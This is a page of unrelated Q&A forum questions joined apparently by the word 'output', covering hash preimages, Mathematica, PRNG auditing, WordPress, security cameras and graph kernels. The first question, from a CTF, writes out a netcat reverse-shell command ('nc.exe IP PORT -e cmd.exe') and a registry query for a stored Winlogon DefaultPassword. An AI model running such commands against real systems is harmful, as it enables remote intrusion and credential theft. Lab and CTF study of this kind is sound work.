Powershell (WinRM) and cmd.exe: reg query output deviation

during a CTF I encountered the following anomaly regarding PS & cmd.exe:

  • I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
  • Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c “nc.exe IP PORT -e cmd.exe” to spawn an additional regular cmd.exe shell back to me.

I searched the registry for stored passwords using the following command: reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”

This is where I noticed that the PS shell reg query returns considerable more output than the cmd.exe reg query. PS includes the “DefaultPassword” entry, whereas cmd.exe does not include this value.

The full output deviation is captured in the following screenshot: req query on powershell shows more entries than req query on cmd.exe The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe “sub-shell”.

Any hints to why this behavior occurs are greatly appreciated.

Is there necessarily an infinite number of inputs to any given output in a crypto hash function? [migrated]

This might be a very easy question. Let’s consider cryptograhic hash functions with the usual properties, weak and strong collision resistance and preimage resistance.

For any given output, obviously there are multiple inputs. But is that necessarily an infinite number of preimages, for any given hash value?

How would I go about giving a formal proof that there exists no crypto hash function h() such that there is a given value v = h(m*) for which the possible set of inputs m* is finite? Would this necessarily break collision resistance?

Output of Two Functions as a Single Function

I have two functions: One of which outputs a number and the other outputs a picture. What I would like to do is create a single function that would output both the number and the picture.

As a MWE take the following:

Tri = Triangle[{{0, 0}, {0, 1}, {1, 0}}] PictureTest[x_, y_, z_] :=  RegionPlot[x >= z*y && {x, y} \[Element] Tri, {x, 0, 1}, {y, 0, 1}] MinTest[x_, y_, z_] := Minimize[{x, x >= y + z && {x, y} \[Element] Tri}, {x, y}] 

I would like to create a new function NewFunc[x_,y_] that gives as an output both PictureTest[x,y,z] and MinTest[x,y,z]. (Or even better if it added some words and gave PictureTest[x,y,z] and “the minimum is MinTest[x,y,z].”)

(This might seem silly given the specific functions above. But I’m working with more complicated functions and z is in fact many variables. So, in practice, I’d like to input “z” once and get the answer to both PictureTest and MinText. I imagine the answer is in the Mathematica documentation, but I don’t quite know what I am looking for. I’m not even sure if I’m using the correct tags.)

How can I validate that a PRNG’s output is insecure and predictable?

Say I talk to a developer who is using some output of a Pseudo-random number generator in order to do some security task. I know based upon common knowledge that only Cryptographically Secure Pseudo Random Numbers should be used.

However, I want to take this a step further – how would I create a proof-of-concept that the current method is not secure? I would guess that I need a large collection of outputs from this particular PRNG algorithm… But aside from that, I have no idea what else I would need to do. Is there a way for me to use a cryptanalysis tool to derive the seed or salt (assuming there is one)? How can I prove or disprove that such a PRNG is predictable using security auditing tools and/or scripts?

How do I control the output of a custom post type in the loop?

I’m working on a new content type. Let’s call it hotel rooms (it is not but the similarities are good enough).

Now, for each room, I will have a title and a description but I will also have a lot of metadata – beds, sea view, room number, size, summer price, winter price, and so on.

I would like my custom type to work on any theme. That means I need to provide a way to layout the post for index.php, single.php, and so forth. Obviously, presenting metadata is a large part of this.

How do I do this?

Do 4k IP security cameras with uncompressed 4k video output exist? [closed]

Are there any companies selling IP security cameras that produce uncompressed 4k RAW video output (to NVR, or even to cal sd-card)? Almost all popular brands compress using H.265 (HEVC) which works great for many reasons (network bandwidth, storage, playback, remote streaming, on and on)

However, my local network resources are not limited by bandwidth, storage, processing power and I’d really love to find a camera that, at the least, saves a lossless 4k version of the video output, maybe to internal sd-card in case of later investigation requiring higher resolution/quality version. I’ve been searching around for about a week now, in various subs here and other places like Security on StackExchange, Discord, forums, etc.

For those that are more list-oriented, I’m looking for something with the following traits:


  • 4k video output, minimum 8 MP uncompressed @ ~32Mbps bitrate (at least to internal sd-card)


  • Wired RJ45/Ethernet connection, with POE.
  • Compatibility with Home Assistant / Blue Iris software
  • Supports ONVIF protocol.
  • Decent viewing angle, but definitely not wide (e.g. not > 180 deg, etc).

I really haven’t found anything out there that meets this criteria, so any suggestions appreciated.

Algorithm for finding an irreducible kernel of a DAG in O(V*e) time, where e is number of edges in output

An irreducible kernel is the term used in Handbook of Theoretical Computer Science (HTCS), Volume A “Algorithms and Complexity” in the chapter on graph algorithms. Given a directed graph G=(V,E), an irreducible kernel is a graph G’=(V,E’) where E’ is a subset of E, and both G and G’ have the same reachability (i.e. their transitive closures are the same), and removing any edge from E’ would not satisfy this condition, i.e. E’ is minimal (although not necessarily the minimum size possible).

A minimum equivalent graph is similar, except it also has the fewest number of edges among all such graphs. Both of these concepts are similar to a transitive reduction, but not the same because a transitive reduction is allowed to have edges that are not in E.

HTCS says that there is an algorithm to calculate an irreducible kernel of a directed acyclic graph in time O(V*e) time, where V is the number of vertices, and e is the number of edges in the irreducible kernel, i.e. the output of the algorithm. The reference given for this is the following paper, which I have not been able to find an on line source for yet (links or other sources welcome — I can ask at a research library soon if nothing turns up).

Noltemeier, H., “Reduction of directed graphs to irreducible kenrels”, Discussion paper 7505, Lehrstuhl Mathematische Verfahrenforschung (Operations Research) und Datenverarbeitung, Univ. Gottingen, Gottingen, 1975.

Does anyone know what this algorithm is? It surprises me a little that it includes the number of edges in the output graph, since that would mean it should run in O(n^2) time given an input graph with O(n^2) edges that represents a total order, e.g. all nodes are assigned integers from 1 up to n, and there is an edge from node i to j if i < j. That doesn’t seem impossible, mind you, simply surprising.